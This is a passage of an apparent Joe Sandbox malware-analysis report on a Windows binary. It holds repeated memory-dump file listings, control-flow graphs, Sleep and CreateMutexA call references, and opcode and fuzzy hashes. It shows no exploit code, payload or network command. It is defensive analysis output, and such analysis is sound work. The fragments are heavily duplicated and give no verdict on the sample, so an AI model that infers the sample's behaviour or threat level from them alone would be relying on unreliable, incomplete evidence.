                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                            • Opcode ID: 31a1e472c6478fbc1b3c80c70f37a6a2960f0adb36f64e48a42d588dffd873d6
                                                                                                                                                                                            • Instruction ID: c8bb8ac00753429c18d4f5b4d96e409b582496cbb1891853fa53b5661f567a01
                                                                                                                                                                                            • Opcode Fuzzy Hash: 31a1e472c6478fbc1b3c80c70f37a6a2960f0adb36f64e48a42d588dffd873d6
                                                                                                                                                                                            • Instruction Fuzzy Hash: B03128716002449BEF0CEB7CDC89B6DBBB2FBC1324F288618E015D76D1D77599808693

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 457 899adc-899ae8 458 899aea-899af8 457->458 459 899afe-899d91 call 8ad663 call 8a7a00 call 895c10 call 898b30 call 8a8220 call 8a7a00 call 895c10 call 898b30 call 8a8220 457->459 458->459 460 89a917 458->460 463 89a953-89a994 Sleep CreateMutexA 460->463 464 89a917 call 8c6c6a 460->464 468 89a9a7-89a9a8 463->468 469 89a996-89a998 463->469 464->463 469->468 471 89a99a-89a9a5 469->471 471->468
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0089A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,008F3254), ref: 0089A981
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                            • Opcode ID: 794ac890b38bb3a723bddbaac48e300334936101bce9b919836632034e549979
                                                                                                                                                                                            • Instruction ID: 2e4a4e7761becff85d79e2a277f3ac52cea95c1af459a6aa75512343098d377f
                                                                                                                                                                                            • Opcode Fuzzy Hash: 794ac890b38bb3a723bddbaac48e300334936101bce9b919836632034e549979
                                                                                                                                                                                            • Instruction Fuzzy Hash: 842122317042449BEF1CAB6CEC89B2CB762FBC1320F28461DE458D76D1DB7999808652

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 525 89a856-89a86e 526 89a89c-89a89e 525->526 527 89a870-89a87c 525->527 530 89a8a9-89a8b1 call 897d30 526->530 531 89a8a0-89a8a7 526->531 528 89a87e-89a88c 527->528 529 89a892-89a899 call 8ad663 527->529 528->529 532 89a94e-89a987 call 8c6c6a Sleep CreateMutexA 528->532 529->526 541 89a8b3-89a8bb call 897d30 530->541 542 89a8e4-89a8e6 530->542 534 89a8eb-89a916 call 8a80c0 531->534 545 89a98e-89a994 532->545 541->542 549 89a8bd-89a8c5 call 897d30 541->549 542->534 547 89a9a7-89a9a8 545->547 548 89a996-89a998 545->548 548->547 551 89a99a-89a9a5 548->551 549->542 553 89a8c7-89a8cf call 897d30 549->553 551->547 553->542 557 89a8d1-89a8d9 call 897d30 553->557 557->542 560 89a8db-89a8e2 557->560 560->534
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0089A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,008F3254), ref: 0089A981
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459227978.0000000000B13000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459240014.0000000000B14000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459252716.0000000000B16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459264586.0000000000B17000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459278527.0000000000B1C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459291171.0000000000B23000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459305143.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459320428.0000000000B32000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459333285.0000000000B33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459345440.0000000000B34000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459359173.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459379108.0000000000B42000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459393452.0000000000B44000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459405663.0000000000B45000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459417847.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459460215.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459485889.0000000000B92000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459501980.0000000000B97000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459515010.0000000000B99000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459532625.0000000000BA7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459545214.0000000000BA8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_890000_file.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1464230837-0
                                                                                                                                                                                            • Opcode ID: 6f7a8d7a4df04211696253f96afe3ee4cd6d9be60890d4d1183f16684b1db10a
                                                                                                                                                                                            • Instruction ID: d6228ab340d632de808fa637903911fc333bc1b2736f3a07937d7d40215bf954
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6f7a8d7a4df04211696253f96afe3ee4cd6d9be60890d4d1183f16684b1db10a
                                                                                                                                                                                            • Instruction Fuzzy Hash: CC213A712542059AFF2C776C9C8AB3DB652FF81314F3C0826E108E63D1DB7A998081D3

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 502 89a34f-89a35b 503 89a35d-89a36b 502->503 504 89a371-89a39a call 8ad663 502->504 503->504 505 89a93a 503->505 510 89a3c8-89a916 call 8a80c0 504->510 511 89a39c-89a3a8 504->511 508 89a953-89a994 Sleep CreateMutexA 505->508 509 89a93a call 8c6c6a 505->509 516 89a9a7-89a9a8 508->516 517 89a996-89a998 508->517 509->508 513 89a3aa-89a3b8 511->513 514 89a3be-89a3c5 call 8ad663 511->514 513->505 513->514 514->510 517->516 520 89a99a-89a9a5 517->520 520->516
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 0089A963
                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,008F3254), ref: 0089A981
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.1457682859.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.1457671208.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457682859.00000000008F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457732745.00000000008F9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457774864.00000000008FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457790768.0000000000905000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457802488.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1457813801.0000000000907000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458357790.0000000000A5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458376642.0000000000A60000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458392856.0000000000A75000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458420879.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458465446.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458626713.0000000000A85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458645187.0000000000A86000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458657521.0000000000A88000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458929915.0000000000A8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458945923.0000000000A8B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458960976.0000000000A8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458977774.0000000000A9D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1458989840.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459005401.0000000000AB3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459024005.0000000000AB4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459038850.0000000000ABE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459055488.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459072461.0000000000ADE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459086887.0000000000AE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459101565.0000000000AEB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459116097.0000000000AF0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459131565.0000000000AF6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459144829.0000000000AF7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459158858.0000000000AF8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459171112.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459184882.0000000000B05000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459199433.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.1459214292.0000000000B11000.00000080.00000001.01000000.00000003.sdmpDownload File
